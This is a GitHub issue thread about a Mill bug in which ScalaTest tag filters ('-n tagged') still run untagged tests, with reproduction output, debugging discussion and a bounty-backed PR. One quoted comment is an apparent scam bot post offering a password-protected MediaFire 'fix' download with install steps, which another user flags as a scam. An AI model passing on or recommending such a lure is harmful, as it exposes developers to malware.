### ISSUE TITLE
Run tagged ScalaTest tests also runs all others tests (500USD Bounty)

### ISSUE THREAD

**Issue by Readon** [com-lihaoyi/mill#3440]
---

**From the maintainer Li Haoyi**: I'm putting a 500USD bounty on this issue, payable by bank transfer on a merged PR fixing this.

---

When running testOnly with "-- -n [tag]" by mill it would run all tests including the tagged test.
However, this option is used normally only run the tagged test without more, just as sbt doing.

I have create a minimum example at [my fork](https://github.com/Readon/mill/tree/main/example/scalalib/testing/4-test-tag).
Just run the run.sh, the results would be as below in 0.11.11.

Cmd: `sbt 'testOnly -- -n tagged' `
works good, only run the tagged test.
```
tagged run
[info] MyAppSpec:
[info] - Addition test with tag
```

Cmd: `sbt 'testOnly -- -l tagged' `
works good, only run tests without specified tag.
```
untagged run
[info] MyAppSpec:
[info] - Addition should work correctly
```

Cmd: `mill __.testOnly -- -n tagged`
**Wrong** this command **should not** run tests with tag.
```
MyAppSpec:
untagged run              //unwanted.
- Addition should work correctly
tagged run
- Addition test with tag
```

Cmd: `mill __.testOnly -- -l tagged`
works good, only run tests without specified tag.
```
MyAppSpec:
untagged run
- Addition should work correctly
```

**Comment by Readon** [comment]
mill version 0.11.12 have also been tested, the results is the same.

**Comment by Readon** [comment]
I am sorry, I did not have a mediafire account to download the link though.


------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "com-lihaoyi/mill"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2024年8月31日(星期六) 下午4:29
***@***.***&gt;;
***@***.******@***.***&gt;;
主题:&nbsp;Re: [com-lihaoyi/mill] Run tagged ScalaTest tests also runs all others tests (Issue #3440)





 
hi bro, to fix your trouble try this fix, i see it in another issue,
 https://app.mediafire.com/dqajf1x14ccfd
 password: changeme
 when you installing it, you need to place a check in install to path and select usx

**Comment by lolgab** [comment]
@Readon It's probably a scam bot, don't click the link, please.

**Comment by Readon** [comment]
> @Readon It's probably a scam bot, don't click the link, please.

Thanks, fortunately I do not have account for MediaFire.

**Comment by lolgab** [comment]
@Readon The issue is really strange since the arguments should be handled by the the test runner which is not part of Mill and they seem to be passed correctly. Stranger is the fact that the `-l` flag works correctly.

**Comment by Readon** [comment]
I did not check the arguments inside mill. is that possible sbt have done some extra ops on this arguments?

**Comment by wb14123** [comment]
I can reproduce it in the test directory with the bundled mill script. But when I'm trying to reproduce with the current mill build:
```
./mill -i dist.run example/scalalib/testing/4-test-tag __.test
```
It failed to find any tests:

```
[2523/1] dist.run 
Run completed in 91 milliseconds.
Total number of tests run: 0
Suites: completed 0, aborted 0
Tests: succeeded 0, failed 0, canceled 0, ignored 0, pending 0
```

Am I running the correct command?

**Comment by wb14123** [comment]
I created a PR that I think can fix the issue, but I cannot really test it since the testing command above doesn't work. @lihaoyi or anyone else, could you help me figure out the command to run tests with the dev build?

**Comment by lihaoyi** [comment]
@wb14123 that command is for manually exercising the example tests, which I think isn't what we want for your PR. For your PR, a unit test added in https://github.com/com-lihaoyi/mill/blob/main/scalalib/test/src/mill/scalalib/TestModuleTests.scala, with the code-under-test in a subfolder of scalalib/test/resources, which you can run via `./mill scalalib.test mill.scalalib.HelloWorldTests.nameoftest`

**Comment by wb14123** [comment]
@lihaoyi Yeah agreed on unit test. But I also want to manually run the `testOnly` command to test the the build work with the test project. Not sure why it's not able to find the test cases.

**Comment by lihaoyi** [comment]
@wb14123 your command looks correct. What's the content of `4-test-tag/`? Are your tests in `ScalaModule` layout of `test/src/...`, or in the `SbtModule` layout of `src/test/scala/...`?

**Comment by wb14123** [comment]
The content is the code mentioned in the issue at the beginning: https://github.com/Readon/mill/tree/main/example/scalalib/testing/4-test-tag . Running `../../../../mill __.test` under that directory works.

**Comment by wb14123** [comment]
Anyway, added tests in the PR. The tests failed without my change and succeed with the change. So the fix should be good.
